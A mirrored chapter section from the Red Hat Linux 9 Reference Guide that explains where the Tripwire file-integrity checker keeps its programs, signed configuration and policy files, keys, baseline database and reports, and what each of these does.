Main Menu
PHP Tools
PHP Help Request
PHP Editors Newsletter
Editor Search
Reviewed PHP Editors
Latest News
Submit News
PHP Tutorials
PHP Book Reviews
Online Book Chapters
PHP Games

Forums
RSS 2.0
PHP Desktop Editors
Other PHP Tools
PHP Contests
PHP Programming Help
Linux Help
Apache Help
MySQL Help
PHP Games
PHP Jobs
PHP Forums Home

Programming Contest
PHP Contests
PHP Contests Archive

Documentation
PHP Manual
PEAR Manual
PHP-GTK Manual
Smarty Manual
PostgreSQL Manual
CSS 2 Reference
Redhat Linux 9
HTML 4.01
Apache 2 Manual

Partner Sites
Ajax Tutorials
Webmaster Resources
Web Templates
PHP Scripts
PHP Code Examples
Learn PHP playing Trivia
PHP & MySQL Forums
Web Development Index
web site templates

Sponsors

NuSphere



All Red Hat Linux documents are copyrighted to Red Hat Inc.

Red Hat Linux 9: Red Hat Linux Reference Guide
PrevChapter 19. TripwireNext

19.10. Tripwire File Location Reference

Before working with Tripwire, you should know where important files for the application are located. Tripwire stores its files in a variety of places depending on their role.

  • Within the /usr/sbin/ directory, you will find the following programs:

    • tripwire

    • twadmin

    • twprint

  • Within the /etc/tripwire/ directory, you will find the following files:

    • twinstall.sh — The initialization script for Tripwire.

    • twcfg.txt — The sample configuration file supplied by the Tripwire RPM.

    • tw.cfg — The signed configuration file created by the twinstall.sh script.

    • twpol.txt — The sample policy file supplied by the Tripwire RPM.

    • tw.pol — The signed policy file created by the twinstall.sh script.

    • Key Files — The local and site keys created by the twinstall.sh script which end with a .key file extension.

  • After running the twinstall.sh installation script, you will find the following files in the /var/lib/tripwire/ directory:

    • The Tripwire Database — The database of your system's files and has a .twd file extension.

    • Tripwire Reports — The report/ directory is where Tripwire reports are stored.

The next section explains more about the roles these files play in the Tripwire system.

19.10.1. Tripwire Components

The following describes in more detail the roles the listed in the previous section play in the Tripwire system.

/etc/tripwire/tw.cfg

This is the encrypted Tripwire configuration file which stores system-specific information, such as the location of Tripwire data files. The twinstall.sh installer script and twadmin command generate this file using the information in the text version of the configuration file, /etc/tripwire/twcfg.txt.

After running the the installation script, the system administrator can change parameters by editing /etc/tripwire/twcfg.txt and regenerating a signed copy of the tw.cfg file using the twadmin command. See Section 19.9 Updating the Tripwire Configuration File for more information on how to do this.

/etc/tripwire/tw.pol

The active Tripwire policy file is an encrypted file containing comments, rules, directives, and variables. This file dictates the way Tripwire checks your system. Each rule in the policy file specifies a system object to be monitored. Rules also describe which changes to the object to report and which to ignore.

System objects are the files and directories you wish to monitor. Each object is identified by an object name. A property refers to a single characteristic of an object that Tripwire software can monitor. Directives control conditional processing of sets of rules in a policy file. During installation, the sample text policy file, /etc/tripwire/twpol.txt, is used to generate the active Tripwire policy file.

After running the the installation script, the system administrator can update the Tripwire policy file by editing /etc/tripwire/twpol.txt and regenerating a signed copy of the tw.pol file using the twadmin command. See Section 19.8 Updating the Tripwire Policy File for more information on how to do this.

/var/lib/tripwire/host_name.twd

When first initialized, Tripwire uses the signed policy file rules to create this database file. The Tripwire database is a baseline snapshot of the system in a known secure state. Tripwire compares this baseline against the current system to determine what changes have occurred. This comparison is called an integrity check.

/var/lib/tripwire/report/host_name-date_of_report-time_of_report.twr

When you perform an integrity check, Tripwire produces report files in the /var/lib/tripwire/report/ directory. The report files summarize any file changes that violated the policy file rules during the integrity check. Tripwire reports are named using the following convention: host_name-date_of_report-time_of_report.twr. These reports detail the differences between the Tripwire database and your actual system files.

PrevHomeNext
Updating the Tripwire Configuration FileUpAdditional Resources
© Copyright 2003-2023 www.php-editors.com. The ultimate PHP Editor and PHP IDE site.